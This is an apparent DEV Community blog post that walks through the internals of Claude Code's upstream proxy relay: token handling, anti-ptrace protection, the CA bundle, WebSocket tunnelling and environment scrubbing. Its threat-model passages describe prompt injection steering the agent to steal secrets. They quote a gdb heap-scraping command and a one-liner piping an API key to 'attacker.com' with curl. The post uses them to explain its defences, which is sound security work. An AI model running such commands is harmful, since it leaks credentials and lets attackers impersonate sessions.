DEV Community: Laurent DeSegur

The Upstream Proxy: How Claude Code Intercepts Subprocess HTTP Traffic

Laurent DeSegur — Thu, 09 Apr 2026 01:18:40 +0000

When Claude Code runs in a cloud container, every subprocess it spawns — curl, gh, python, kubectl — needs to reach external services. But the container sits behind an organization's security perimeter. The org needs to inject credentials (API keys, auth headers) into outbound HTTPS requests, log traffic for compliance, and block unauthorized endpoints. The subprocess doesn't know any of this. It just wants to curl https://api.datadog.com.

The naive solution: configure a corporate proxy and trust that every tool respects HTTPS_PROXY. But that only works if the tool trusts the proxy's TLS certificate. A corporate proxy that inspects HTTPS traffic presents its own certificate — a man-in-the-middle certificate that curl and python will reject unless they trust the issuing CA. Every runtime has its own CA trust store: Node uses NODE_EXTRA_CA_CERTS, Python uses REQUESTS_CA_BUNDLE or SSL_CERT_FILE, curl uses CURL_CA_BUNDLE, Go uses the system store. Miss one and the subprocess fails with CERTIFICATE_VERIFY_FAILED.

And there's a deeper problem. The container's ingress is a GKE L7 load balancer with path-prefix routing. It doesn't support raw HTTP CONNECT tunnels — the standard way proxies handle HTTPS. You can't just point HTTPS_PROXY at the ingress and expect CONNECT to work. The infrastructure needs a different transport.

Claude Code solves this with an upstream proxy relay: a local TCP server that accepts standard HTTP CONNECT requests from subprocesses, tunnels the bytes over WebSocket to the cloud gateway, and lets the gateway handle TLS interception and credential injection. The relay runs inside the container, bound to localhost, invisible to the agent. Subprocesses see a standard HTTPS proxy at 127.0.0.1:<port> and a CA bundle that trusts both the system CAs and the gateway's MITM certificate.

This article traces every layer: the initialization sequence, the token lifecycle, the anti-ptrace defense, the CA certificate chain, the CONNECT-over-WebSocket protocol, the protobuf wire format, the NO_PROXY bypass list, and the subprocess environment injection that ties it all together.

When Does This Activate?

The upstream proxy is a CCR (Cloud Code Runtime) feature. It only activates when three conditions are met:

function initUpstreamProxy():
    # Gate 1: Are we in a cloud container?
    if not env.CLAUDE_CODE_REMOTE:
        return disabled

    # Gate 2: Has the server enabled the proxy for this session?
    if not env.CCR_UPSTREAM_PROXY_ENABLED:
        return disabled

    # Gate 3: Do we have a session ID?
    if not env.CLAUDE_CODE_REMOTE_SESSION_ID:
        return disabled

    # Gate 4: Is there a session token on disk?
    token = readFile("/run/ccr/session_token")
    if not token:
        return disabled

    # All gates passed — proceed with initialization
    ...

The CCR_UPSTREAM_PROXY_ENABLED flag is evaluated server-side, where the feature flag system has warm caches. The container gets a fresh environment with no cached flags, so a client-side check would always return the default (false). The server makes the decision and injects the result into the container's environment.

Every subsequent step fails open: if anything goes wrong — CA download fails, relay can't bind, WebSocket connection breaks — the proxy is disabled and the session continues without it. A broken proxy setup must never break an otherwise-working session.

The Token Lifecycle

The session token authenticates the relay to the cloud gateway. Its lifecycle is designed around a single threat: prompt injection leading to token exfiltration.

The attack scenario: Claude Code runs user-provided code. A malicious prompt tricks the model into executing a shell command that reads the token and sends it to an attacker-controlled server. With the token, the attacker can impersonate the session and access the organization's internal services through the proxy.

The defense is a four-step sequence:

Step 1: Read the Token

token = readFile("/run/ccr/session_token")

The CCR orchestrator writes the token to a tmpfs mount at container startup. It's readable by the process user and exists only in memory-backed storage — never on a persistent disk.

Step 2: Block ptrace

function setNonDumpable():
    if platform is not linux:
        return  # only Linux has prctl

    lib = dlopen("libc.so.6")
    PR_SET_DUMPABLE = 4
    lib.prctl(PR_SET_DUMPABLE, 0, 0, 0, 0)

This is the critical security step. prctl(PR_SET_DUMPABLE, 0) tells the Linux kernel that this process cannot be ptrace'd by any process running as the same UID. Without this, a prompt-injected command like gdb -p $PPID -batch -ex 'find ...' could attach to the Claude Code process, scan its heap, and extract the token from memory.

The call uses Bun's FFI (Foreign Function Interface) to directly invoke prctl from libc. It runs on Linux only; on other platforms it silently no-ops. If the FFI call itself fails (wrong libc path, missing symbol), it logs a warning and continues — fail-open, because blocking the entire session over a defense-in-depth measure would be wrong.

Step 3: Start the Relay

The relay binds to localhost and begins accepting CONNECT requests. Only after the relay is confirmed listening does step 4 proceed.

Step 4: Unlink the Token File

await unlink("/run/ccr/session_token")
# Token is now heap-only — file is gone

The token file is deleted from disk. The token now exists only in the process's heap memory, protected by PR_SET_DUMPABLE. A subprocess can't cat /run/ccr/session_token because the file no longer exists. It can't gdb -p $PPID because ptrace is blocked.

The ordering is deliberate: unlink happens AFTER the relay is confirmed up. If the CA download or relay startup fails, the token file remains on disk so a supervisor restart can retry the full initialization. Once the relay is running, the file is expendable.

Why not just use environment variables? Because environment variables are readable by any subprocess via /proc/$PPID/environ. The token would be trivially exfiltrable. The heap-only approach requires ptrace, which PR_SET_DUMPABLE blocks.

The CA Certificate Chain

The cloud gateway terminates TLS on behalf of the real upstream server and presents its own certificate. Subprocesses need to trust this certificate. The system downloads the gateway's CA certificate and creates a merged bundle:

function downloadCaBundle(baseUrl, systemCaPath, outPath):
    # Download the gateway's CA cert from the Anthropic API
    response = fetch(baseUrl + "/v1/code/upstreamproxy/ca-cert",
                     timeout: 5000)
    if response not ok:
        return false  # fail-open: proxy disabled

    gatewayCa = response.text()

    # Read the system's existing CA bundle
    systemCa = readFile("/etc/ssl/certs/ca-certificates.crt")

    # Concatenate: system CAs first, gateway CA appended
    mkdir(dirname(outPath))
    writeFile(outPath, systemCa + "\n" + gatewayCa)
    # outPath = ~/.ccr/ca-bundle.crt
    return true

The merged bundle goes to ~/.ccr/ca-bundle.crt. Subprocesses get this path via four environment variables, covering every major runtime's CA discovery mechanism:

Variable	Runtime
`SSL_CERT_FILE`	curl, OpenSSL-based tools
`NODE_EXTRA_CA_CERTS`	Node.js
`REQUESTS_CA_BUNDLE`	Python requests/httpx
`CURL_CA_BUNDLE`	curl (alternative)

The 5-second fetch timeout is deliberate. Bun has no default fetch timeout — without one, a hung CA endpoint would block CLI startup forever. 5 seconds is generous for a small PEM file.

The CONNECT-over-WebSocket Relay

The relay is the core of the system. It translates standard HTTP CONNECT requests into WebSocket tunnels that the cloud gateway can route.

Why WebSocket?

The CCR ingress is a GKE L7 load balancer with path-prefix routing. L7 load balancers inspect HTTP requests and route based on URL paths. HTTP CONNECT is a different protocol — it asks the proxy to establish a raw TCP tunnel, which L7 load balancers typically can't route. There's no connect_matcher in the CDK constructs.

WebSocket, however, is an HTTP upgrade — it starts as a normal HTTP request (routable by L7) and then upgrades to a bidirectional binary channel. The session ingress tunnel already uses this pattern. The upstream proxy follows suit.

The Protocol

The relay listens on 127.0.0.1:0 (ephemeral port) and handles each connection through a two-phase state machine:

Phase 1: CONNECT Accumulation

function handleData(socket, state, data):
    if no WebSocket exists yet:
        # Accumulate bytes until we see the full CONNECT header
        state.connectBuf = concat(state.connectBuf, data)

        headerEnd = indexOf(state.connectBuf, "\r\n\r\n")
        if headerEnd is -1:
            # Guard: reject if header exceeds 8KB (not a real CONNECT)
            if length(state.connectBuf) > 8192:
                socket.write("HTTP/1.1 400 Bad Request\r\n\r\n")
                socket.end()
            return

        # Parse the CONNECT line
        firstLine = state.connectBuf[0:headerEnd].split("\r\n")[0]
        match = regex("CONNECT (\S+) HTTP/1.[01]", firstLine)
        if no match:
            socket.write("HTTP/1.1 405 Method Not Allowed\r\n\r\n")
            socket.end()
            return

        # Save any bytes that arrived after the header
        # (TCP can coalesce CONNECT + TLS ClientHello in one packet)
        trailing = state.connectBuf[headerEnd + 4:]
        if trailing is not empty:
            state.pending.push(trailing)

        openTunnel(socket, state, firstLine)

The 8KB guard prevents a misbehaving client from filling memory with a never-terminating header. The 405 response handles non-CONNECT methods — the relay only does CONNECT, not GET/POST. The trailing-bytes buffer handles TCP coalescing, where the client's CONNECT request and TLS ClientHello arrive in the same TCP segment.

Phase 2: WebSocket Tunnel

function openTunnel(socket, state, connectLine):
    # Open WebSocket to the cloud gateway
    ws = new WebSocket(wsUrl, {
        headers: {
            "Content-Type": "application/proto",
            "Authorization": "Bearer <session-token>"
        }
    })
    ws.binaryType = "arraybuffer"

    ws.onopen = ():
        # Send the CONNECT line + auth to the gateway
        head = connectLine + "\r\n"
             + "Proxy-Authorization: Basic <sessionId:token>\r\n"
             + "\r\n"
        ws.send(encodeChunk(head))

        # Flush any bytes buffered during WS handshake
        state.wsOpen = true
        for buf in state.pending:
            forwardToWs(ws, buf)
        state.pending = []

        # Start keepalive pings (30-second interval)
        state.pinger = setInterval(sendKeepalive, 30000, ws)

    ws.onmessage = (event):
        payload = decodeChunk(event.data)
        if payload and payload.length > 0:
            state.established = true
            socket.write(payload)

    ws.onerror = (event):
        if not state.established:
            socket.write("HTTP/1.1 502 Bad Gateway\r\n\r\n")
        socket.end()

    ws.onclose = ():
        socket.end()

There are two authentication layers. The WebSocket upgrade carries a Bearer token — the gateway requires session-level auth on the upgrade request itself (proto authn: PRIVATE_API). Inside the tunnel, the CONNECT request carries Proxy-Authorization: Basic with the session ID and token — this authenticates the specific tunnel and tells the gateway which target host:port to connect to.

The Content-Type Trap

The WebSocket connection must set Content-Type: application/proto. Without it, the server's Go code treats the chunks as JSON and attempts protojson.Unmarshal on the hand-encoded binary — which silently fails with EOF, producing no error but also no tunnel. This was presumably discovered through debugging, not design.

Keepalive

The sidecar proxy has a 50-second idle timeout. The relay sends an empty protobuf chunk (zero-length data field) every 30 seconds as an application-level keepalive. Not all WebSocket implementations expose ping(), so the empty chunk serves as a universal keepalive that the server can ignore.

The Pending Buffer

Between parsing the CONNECT header and the WebSocket connection becoming open, bytes can keep arriving. The subprocess's TLS library doesn't wait for the proxy handshake — it can send the TLS ClientHello immediately after the CONNECT request, sometimes in the same TCP packet (kernel coalescing), sometimes in a separate data event that fires before ws.onopen.

Without buffering, these bytes would be silently dropped. The relay tracks a pending array: any data that arrives after the CONNECT parse but before wsOpen is true gets pushed to pending. When onopen fires, pending is flushed in order. This handles both sources of early data:

# TCP coalescing: CONNECT + ClientHello in one packet
data = [CONNECT api.example.com:443 HTTP/1.1\r\n\r\n][TLS ClientHello...]
                                                       ^--- trailing bytes → pending

# Async race: data event fires before onopen
ws = new WebSocket(...)   # handshake in flight
# ... socket data callback fires with TLS bytes ...
if not wsOpen:
    pending.push(data)    # buffered, not lost

The WebSocket URL

The relay constructs the WebSocket URL from the API base URL with a simple transform:

wsUrl = baseUrl.replace("http", "ws") + "/v1/code/upstreamproxy/ws"
# https://api.anthropic.com → wss://api.anthropic.com/v1/code/upstreamproxy/ws
# http://localhost:8080     → ws://localhost:8080/v1/code/upstreamproxy/ws

The replace catches both http→ws and https→wss because the regex matches only the first occurrence. The server-side endpoint path mirrors the REST API namespace.

The 502 Boundary

The relay only sends HTTP/1.1 502 Bad Gateway if the tunnel hasn't been established yet. Once the first server response has been forwarded (the 200 Connection Established), the connection is carrying TLS. Writing a plaintext HTTP error into a TLS stream would corrupt the client's connection. After establishment, the relay just closes the socket silently.

A closed flag prevents double-end: the WebSocket onerror event is always followed by onclose, and without a guard, both handlers would call socket.end() on an already-ended socket. The first handler to fire sets closed = true; the second sees the flag and returns immediately.

Two Runtimes, Two TCP Servers

Claude Code supports both Bun and Node as runtimes. The relay needs a TCP server, and the two runtimes have fundamentally different TCP APIs. Rather than abstracting behind a compatibility layer, the relay implements two complete server paths and dispatches at startup:

function startRelay(wsUrl, authHeader, wsAuthHeader):
    if typeof Bun is not undefined:
        return startBunRelay(wsUrl, authHeader, wsAuthHeader)
    else:
        return startNodeRelay(wsUrl, authHeader, wsAuthHeader)

The Bun Path

Bun provides Bun.listen(), a callback-based TCP server where each connection gets an open, data, drain, close, and error handler. Connection state is stored directly on the socket's data property — no external map needed.

The critical difference is write backpressure. When you call sock.write(bytes) in Bun, it returns the number of bytes actually written to the kernel buffer. If the buffer is full, it returns less than the full length. The remaining bytes are silently dropped — Bun does not auto-buffer them.

The relay handles this with an explicit write queue per connection:

function bunWrite(socket, state, payload):
    bytes = toBytes(payload)

    # If there's already a backlog, just queue
    if state.writeBuf is not empty:
        state.writeBuf.push(bytes)
        return

    # Try writing directly
    n = socket.write(bytes)
    if n < bytes.length:
        # Partial write — queue the remainder
        state.writeBuf.push(bytes[n:])

# When the kernel buffer drains, Bun calls drain()
function drain(socket):
    while state.writeBuf is not empty:
        chunk = state.writeBuf[0]
        n = socket.write(chunk)
        if n < chunk.length:
            state.writeBuf[0] = chunk[n:]
            return  # still full, wait for next drain
        state.writeBuf.shift()

Without this, a fast upstream server sending data faster than the client can consume would silently lose bytes mid-TLS-stream — corrupting the connection with no error message.

The Node Path

Node's net.createServer() takes a connection callback. Each connection is a Socket object with event emitters. Connection state is stored in a WeakMap keyed by the socket — when the socket is garbage-collected, the state goes with it.

Node's sock.write() is fundamentally different from Bun's: it always buffers. If the kernel buffer is full, write() returns false to signal backpressure, but the bytes are already queued internally. They will be flushed when the buffer drains. No explicit write queue is needed.

# Node path: write() auto-buffers, never drops bytes
adapter = {
    write: (payload) -> socket.write(toBuffer(payload)),
    end: () -> socket.end()
}

This is why the relay has two implementations rather than one: the core CONNECT parsing and WebSocket tunneling logic is shared (via handleData and openTunnel), but the TCP I/O layer has different correctness requirements. A single abstraction would either waste memory in Node (unnecessary write queue) or lose bytes in Bun (missing write queue).

The Egress Proxy Problem

The CCR container sits behind an egress gateway — direct outbound connections are blocked. This creates a chicken-and-egg problem: the relay needs to open a WebSocket to the cloud gateway, but the WebSocket connection itself must go through the egress proxy.

Node's undici.WebSocket (the globalThis.WebSocket in Node) does not consult the global dispatcher for upgrade requests. So even though the process has HTTPS_PROXY configured, the WebSocket wouldn't use it. The relay works around this by using the ws package with an explicit proxy agent:

# Node path: preload ws package, pass explicit agent
WS = require("ws")
ws = new WS(wsUrl, {
    headers: { "Content-Type": "application/proto", Authorization: bearerToken },
    agent: getWebSocketProxyAgent(wsUrl),  # CONNECT through egress proxy
    tls: getWebSocketTLSOptions()          # mTLS certs if configured
})

The ws package is preloaded during startNodeRelay() — before any connection arrives — so that openTunnel() stays synchronous. If the import('ws') happened inside openTunnel, the CONNECT state machine would race: a second data event could fire while the import was awaiting, and the state would be inconsistent.

Bun's native WebSocket accepts a proxy URL directly as a constructor option — no agent needed. It also accepts a tls option for custom certificates. The Bun path is simpler because the runtime was designed for this:

# Bun path: proxy and TLS as constructor options
ws = new WebSocket(wsUrl, {
    headers: { "Content-Type": "application/proto", Authorization: bearerToken },
    proxy: getWebSocketProxyUrl(wsUrl),   # string, not an agent
    tls: getWebSocketTLSOptions()
})

Both paths honor mTLS configuration (client certificates set via CLAUDE_CODE_CLIENT_CERT and CLAUDE_CODE_CLIENT_KEY), so the relay works in enterprise environments that require mutual TLS for all outbound connections.

The Protobuf Wire Format

Bytes between the relay and gateway are wrapped in protobuf messages:

message UpstreamProxyChunk {
    bytes data = 1;
}

The encoding is hand-written — no protobuf library, no code generation:

function encodeChunk(data):
    # Protobuf field 1, wire type 2 (length-delimited) → tag byte 0x0a
    # Tag = (field_number << 3) | wire_type = (1 << 3) | 2 = 10 = 0x0a

    # Varint-encode the length
    varint = []
    n = data.length
    while n > 0x7f:
        varint.push((n & 0x7f) | 0x80)
        n = n >>> 7
    varint.push(n)

    # Assemble: [0x0a] [varint length] [data bytes]
    out = new bytes(1 + varint.length + data.length)
    out[0] = 0x0a
    out[1..] = varint
    out[1+varint.length..] = data
    return out

Decoding is the reverse: verify the 0x0a tag, read the varint length, extract the payload. A shift exceeding 28 bits is rejected (guards against malformed varints). Zero-length chunks are valid (keepalive semantics).

Why hand-encode instead of using protobufjs? For a single-field bytes message, the hand encoding is 10 lines of code. A protobuf runtime library adds a dependency in the hot path — every byte of subprocess traffic passes through this encoder. The trade-off is clear: minimal code, no dependency, maximum throughput.

Large payloads are chunked at 512KB boundaries before encoding. This matches the Envoy per-request buffer cap at the gateway. Week-1 use cases (Datadog API calls) won't hit this limit, but the chunking is designed for future workloads like git push that could send megabytes through the tunnel.

The NO_PROXY Bypass List

Not all traffic should go through the proxy. The bypass list is carefully curated:

NO_PROXY = [
    # Loopback
    "localhost", "127.0.0.1", "::1",

    # RFC1918 private ranges + AWS IMDS
    "169.254.0.0/16", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",

    # Anthropic API — three forms for cross-runtime compatibility
    "anthropic.com", ".anthropic.com", "*.anthropic.com",

    # GitHub (already reachable directly from CCR containers)
    "github.com", "api.github.com", "*.github.com", "*.githubusercontent.com",

    # Package registries
    "registry.npmjs.org", "pypi.org", "files.pythonhosted.org",
    "index.crates.io", "proxy.golang.org"
]

Why Three Forms for Anthropic?

Different runtimes parse NO_PROXY differently:

*.anthropic.com — Bun, curl, and Go interpret * as a glob wildcard
.anthropic.com — Python urllib/httpx treats a leading dot as a suffix match (strips the dot, matches *.anthropic.com)
anthropic.com — Apex domain fallback for runtimes that don't handle the above

All three are needed to cover the ecosystem of tools subprocesses might use.

Why Bypass the Anthropic API?

The comment in the source is blunt: "the MITM breaks non-Bun runtimes." The proxy's MITM certificate is trusted by the merged CA bundle, but not all runtimes use SSL_CERT_FILE. Python's certifi package bundles its own CA store and ignores environment variables unless explicitly configured. A MITM'd connection to the Anthropic API from a Python subprocess would fail with CERTIFICATE_VERIFY_FAILED.

More importantly, the Anthropic API is Claude Code's own backend. There's no need for credential injection or traffic inspection on this path — the CLI already has its own authentication. Routing it through the proxy would add latency and failure modes for no benefit.

Why Bypass Package Registries?

CCR containers already have direct network access to npm, PyPI, crates.io, and Go's module proxy. Routing package installs through the upstream proxy would add latency to npm install and pip install — commands the model runs frequently — for no security benefit. The registries don't need org credentials injected.

Subprocess Environment Injection

The final layer connects everything. Every subprocess Claude Code spawns gets environment variables injected:

function subprocessEnv():
    # Get proxy vars (empty if proxy disabled or not in CCR)
    proxyEnv = getUpstreamProxyEnv()

    # If GHA secret scrubbing is enabled, strip sensitive vars
    if env.CLAUDE_CODE_SUBPROCESS_ENV_SCRUB:
        env = copy(process.env)
        env.merge(proxyEnv)
        for key in SCRUB_LIST:
            delete env[key]
            delete env["INPUT_" + key]  # GHA auto-creates INPUT_<NAME>
        return env

    # Normal case: process.env + proxy overlay
    return merge(process.env, proxyEnv)

The proxy env function is registered lazily. The subprocessEnv module has no static import of the upstream proxy module — this is deliberate. In non-CCR environments (local CLI, IDE integration), the proxy module graph (upstreamproxy + relay + WebSocket + FFI) is never loaded. The registration happens in init only when CLAUDE_CODE_REMOTE is set:

# In init, only when running in CCR:
registerUpstreamProxyEnvFn(getUpstreamProxyEnv)
initUpstreamProxy()

The GHA Secret Scrubbing Layer

When running in GitHub Actions, a separate threat applies: prompt injection can exfiltrate secrets via shell expansion. A malicious prompt could trick the model into running echo $ANTHROPIC_API_KEY | curl attacker.com -d @-. The subprocess environment scrubber removes 20+ sensitive variables:

Anthropic auth: API keys, OAuth tokens, custom headers
Cloud provider creds: AWS secret keys, GCP credentials, Azure client secrets
GitHub Actions OIDC tokens: Leaking these allows minting installation tokens — repo takeover
Actions runtime tokens: Cache poisoning via artifact/cache API — supply-chain pivot
OTEL headers: Often carry Authorization: Bearer tokens for monitoring backends

The scrub list explicitly does NOT include GITHUB_TOKEN and GH_TOKEN. These are job-scoped tokens that expire when the workflow ends. Wrapper scripts need them to call the GitHub API, and their short lifetime limits the blast radius.

The INPUT_* variant deletion handles a GitHub Actions quirk: the with: inputs in a workflow step are auto-duplicated as INPUT_<NAME> environment variables. INPUT_ANTHROPIC_API_KEY would survive the scrub of ANTHROPIC_API_KEY without this.

Child CLI Inheritance

When Claude Code spawns a child CLI process (e.g., a subagent), the child can't re-initialize the relay — the token file was already unlinked. But the parent's relay is still running on localhost. The getUpstreamProxyEnv function detects this case:

function getUpstreamProxyEnv():
    if proxy not initialized locally:
        # Check if we inherited proxy vars from a parent process
        if env.HTTPS_PROXY and env.SSL_CERT_FILE are both set:
            # Pass through parent's proxy configuration
            return inherited proxy vars
        return {}

    # We own the relay — return our vars
    return {
        HTTPS_PROXY: "http://127.0.0.1:<port>",
        https_proxy: "http://127.0.0.1:<port>",
        NO_PROXY: <bypass list>,
        no_proxy: <bypass list>,
        SSL_CERT_FILE: "~/.ccr/ca-bundle.crt",
        NODE_EXTRA_CA_CERTS: "~/.ccr/ca-bundle.crt",
        REQUESTS_CA_BUNDLE: "~/.ccr/ca-bundle.crt",
        CURL_CA_BUNDLE: "~/.ccr/ca-bundle.crt",
    }

Both lowercase and uppercase variants are set for each variable. Some tools read https_proxy, others HTTPS_PROXY. Setting both ensures universal coverage.

Only HTTPS is proxied. The relay handles CONNECT (which is exclusively for HTTPS tunneling) and nothing else. Plain HTTP has no credentials to inject, and routing it through the relay would just produce a 405 error.

Security Boundaries

The upstream proxy operates at the intersection of several trust boundaries:

The model can't read the token. The file is unlinked before the agent loop starts. The heap is non-dumpable. The token never appears in environment variables.

Subprocesses can't reach arbitrary endpoints. Traffic goes through the gateway, which can enforce allowlists and inject org credentials. The NO_PROXY list ensures local and already-authorized traffic bypasses the gateway.

The proxy env vars are classified as dangerous. In Claude Code's environment variable security model, HTTPS_PROXY, SSL_CERT_FILE, and NODE_EXTRA_CA_CERTS are NOT in the safe-vars list. Project-level settings files (.claude/settings.json) can't set them without a trust dialog — a malicious project could otherwise redirect traffic to an attacker's proxy and supply an attacker's CA certificate, enabling MITM of all subprocess HTTPS traffic. Only the upstream proxy system and user-level config can set them.

Initialization fails open but fails loudly. Every failure path logs a warning with the specific error. The session continues without the proxy, so users aren't blocked. But the debug logs make it clear why subprocess traffic isn't being proxied.

Design Trade-offs

Several design decisions in the upstream proxy system reveal the constraints it operates under.

Why Fail-Open Everywhere?

Every step of initialization — gate checks, token read, CA download, relay bind, prctl — fails open. If any step errors, the proxy is disabled and the session continues without it. This is the opposite of how most security systems work, where failure means "deny access."

The reasoning: the upstream proxy is an infrastructure enhancement, not a security gate. Its purpose is to inject credentials and log traffic for organizations. A session without the proxy still works — the agent can't reach org-internal services through the proxy, but it can still do everything else. Blocking the entire session because a CA endpoint was temporarily unreachable would be an availability regression for a feature the user didn't directly ask for.

The fail-open contract is maintained end-to-end. The init entry point wraps the entire initUpstreamProxy() call in a try-catch that logs and continues. Even if the module itself throws an unexpected error, the session starts.

Why No Test Suite?

The upstream proxy has no dedicated test files. This is unusual for a security-sensitive component. The relay's source even exports startNodeRelay specifically so tests can exercise the Node path under Bun (with a comment explaining this), and the upstream proxy module exports resetUpstreamProxyForTests() — the hooks are there, but no tests exist yet.

The likely reason: the system is tightly coupled to infrastructure that's hard to simulate. The relay needs a WebSocket endpoint that speaks protobuf and responds with CONNECT establishment. The CA download hits a real HTTP endpoint. The prctl call needs Linux. The token lifecycle depends on tmpfs. Each piece works correctly in production but is expensive to mock in isolation. This is a testing debt that the exported test hooks suggest the team intends to pay down.

Why Hand-Coded Protobuf Instead of gRPC?

The tunnel carries a single message type with a single bytes field. gRPC would add:

A protobuf compiler step in the build pipeline
A runtime library (~100KB+ for protobufjs)
HTTP/2 framing that the L7 load balancer would need to support
Code generation for a one-field message

The hand-coded encoder is 10 lines. The decoder is 12 lines. Both are trivially auditable. The trade-off breaks clearly in favor of hand-coding for this specific use case.

Why Lazy Module Loading?

The upstream proxy module graph includes WebSocket libraries, Bun FFI bindings, node:net, and the relay state machine. In non-CCR environments (local CLI, IDE integrations), none of this is needed. A static import would load it unconditionally — adding startup latency and memory overhead for every user, even though fewer than 1% run in CCR containers.

The lazy-import pattern pushes this cost to zero for non-CCR users:

# In init, only when CLAUDE_CODE_REMOTE is set:
proxy = await import("upstreamproxy")
registerUpstreamProxyEnvFn(proxy.getUpstreamProxyEnv)
await proxy.initUpstreamProxy()

The subprocess environment module cooperates: it holds a function reference (_getUpstreamProxyEnv) that defaults to undefined. In non-CCR sessions, it's never registered, so subprocessEnv() returns process.env unmodified — no proxy module loaded, no overhead.

Why Both Uppercase and Lowercase Env Vars?

The proxy sets both HTTPS_PROXY and https_proxy, both NO_PROXY and no_proxy. This isn't redundant — it's necessary. The ecosystem is split:

curl prefers lowercase, falls back to uppercase
Python requests checks uppercase first
Go's net/http checks both, prefers HTTPS_PROXY
Node.js (undici) checks lowercase first
Bun checks lowercase first

Setting both ensures every tool in every runtime sees the proxy configuration without requiring users to set variables manually.

Invisible by Design

The upstream proxy has no user-facing UI. No status bar indicator. No toast notification. No --show-proxy-status flag. No React component renders proxy state.

All proxy logging goes through a debug-only channel that writes to ~/.claude/debug/<session-id>.txt. Users only see these messages if they start the CLI with --debug or enable it mid-session with /debug. The messages are tagged [upstreamproxy]:

[upstreamproxy] enabled on 127.0.0.1:49152
[upstreamproxy] relay listening on 127.0.0.1:49152

Or on failure:

[upstreamproxy] no session token file; proxy disabled
[upstreamproxy] ca-cert fetch 404; proxy disabled
[upstreamproxy] relay start failed: EADDRINUSE; proxy disabled

The user can verify the proxy is active by checking environment variables inside a subprocess:

env | grep HTTPS_PROXY   # http://127.0.0.1:<port>
env | grep SSL_CERT_FILE  # ~/.ccr/ca-bundle.crt

This invisibility is deliberate. The proxy is infrastructure plumbing for the container orchestrator, not a user feature. If it works, the user shouldn't notice it. If it fails, the session continues without it and the debug log explains what happened.

The Full Round-Trip

Here's a single curl request traced through every function in the chain, from user action to response.

Step 0: Initialization (happens once at startup)

init()
  → [lazy import upstreamproxy module]
  → registerUpstreamProxyEnvFn(getUpstreamProxyEnv)
  → initUpstreamProxy()
    → isEnvTruthy("CLAUDE_CODE_REMOTE")         # gate 1
    → isEnvTruthy("CCR_UPSTREAM_PROXY_ENABLED")  # gate 2
    → readToken("/run/ccr/session_token")        # gate 3-4
    → setNonDumpable()                           # prctl via Bun FFI
    → downloadCaBundle(baseUrl, systemCaPath, outPath)
    → startUpstreamProxyRelay({ wsUrl, sessionId, token })
      → startBunRelay() or startNodeRelay()      # runtime dispatch
    → registerCleanup(() => relay.stop())
    → unlink(tokenPath)                          # token now heap-only

Step 1: Model generates curl https://api.datadog.com/v1/metrics

The Bash tool prepares to spawn the subprocess:

BashTool.executeCommand(command)
  → Shell.execute(command, { env: subprocessEnv(), ... })
    → subprocessEnv()
      → _getUpstreamProxyEnv()                   # registered function pointer
        → getUpstreamProxyEnv()                   # returns { HTTPS_PROXY, SSL_CERT_FILE, ... }
      → merge(process.env, proxyEnv)
    → spawn(binary, args, { env: mergedEnv })

The child curl process inherits HTTPS_PROXY=http://127.0.0.1:49152 and SSL_CERT_FILE=~/.ccr/ca-bundle.crt.

Step 2: curl sends CONNECT to the relay

curl reads HTTPS_PROXY, opens a TCP connection to 127.0.0.1:49152, and sends:

CONNECT api.datadog.com:443 HTTP/1.1
Host: api.datadog.com:443

The relay's TCP server fires:

[socket open]
  → newConnState()                               # { connectBuf, pending, wsOpen, established, closed }

[socket data: CONNECT header arrives]
  → handleData(adapter, state, data, ...)
    → Buffer.concat(state.connectBuf, data)
    → indexOf("\r\n\r\n")                        # found at end of header
    → regex match "CONNECT api.datadog.com:443 HTTP/1.1"
    → stash trailing bytes in state.pending
    → openTunnel(adapter, state, connectLine, ...)
      → new WebSocket(wsUrl, { headers, proxy/agent, tls })

Step 3: WebSocket opens, CONNECT line forwarded to gateway

ws.onopen()
  → encodeChunk(head)                            # head = CONNECT line + Proxy-Authorization
    → [0x0a, varint(length), ...bytes]           # protobuf wire encoding
  → ws.send(encodedChunk)
  → state.wsOpen = true
  → flush state.pending                          # TLS ClientHello if coalesced
    → forwardToWs(ws, buf)
      → encodeChunk(slice) for each 512KB chunk
      → ws.send(encodedChunk)
  → setInterval(sendKeepalive, 30000, ws)

Step 4: Gateway responds with 200, curl proceeds with TLS

ws.onmessage(event)
  → decodeChunk(raw)                             # verify 0x0a tag, read varint, extract payload
  → state.established = true                     # 502 boundary: no more plaintext errors
  → adapter.write(payload)                       # "HTTP/1.1 200 Connection Established\r\n\r\n"

curl sees the 200, starts TLS handshake through the tunnel. Every subsequent data event follows the same path: handleData → forwardToWs → encodeChunk → ws.send (client to server), and ws.onmessage → decodeChunk → adapter.write (server to client).

Step 5: Cleanup when curl exits

[socket close]
  → cleanupConn(state)
    → clearInterval(state.pinger)                # stop keepalive
    → state.ws.close()                           # close WebSocket
    → state.ws = undefined

Step 6: Session shutdown

gracefulShutdown()
  → runCleanupFunctions()
    → relay.stop()                               # registered during init
      → server.stop(true) [Bun] or server.close() [Node]

Every function in this chain is named. The total path from model output to subprocess response is: BashTool.executeCommand → Shell.execute → subprocessEnv → getUpstreamProxyEnv → spawn → [kernel TCP] → handleData → openTunnel → encodeChunk → [WebSocket] → [gateway] → decodeChunk → adapter.write → [kernel TCP] → curl.

The Complete Sequence

Here's the full initialization, end to end:

Gate check: Verify CLAUDE_CODE_REMOTE, CCR_UPSTREAM_PROXY_ENABLED, session ID.
Read token: Load session token from /run/ccr/session_token (tmpfs).
Block ptrace: prctl(PR_SET_DUMPABLE, 0) via Bun FFI to libc.
Download CA: Fetch gateway CA from /v1/code/upstreamproxy/ca-cert, merge with system bundle, write to ~/.ccr/ca-bundle.crt.
Start relay: Bind TCP server to 127.0.0.1:0, get ephemeral port.
Unlink token: Delete token file from disk. Token is now heap-only.
Register env function: Wire getUpstreamProxyEnv() into subprocessEnv().
Subprocess spawned: Model runs curl https://api.datadog.com/v1/metrics. The subprocess inherits HTTPS_PROXY=http://127.0.0.1:<port> and SSL_CERT_FILE=~/.ccr/ca-bundle.crt.
CONNECT request: curl sends CONNECT api.datadog.com:443 HTTP/1.1 to the local relay.
WebSocket tunnel: Relay opens WebSocket to CCR gateway, forwards the CONNECT line with Proxy-Authorization.
Credential injection: Gateway MITMs the TLS connection, injects org-configured headers (e.g., DD-API-KEY), forwards to the real upstream.
Bidirectional relay: Bytes flow: curl ↔ TCP ↔ protobuf chunks ↔ WebSocket ↔ gateway ↔ Datadog API.

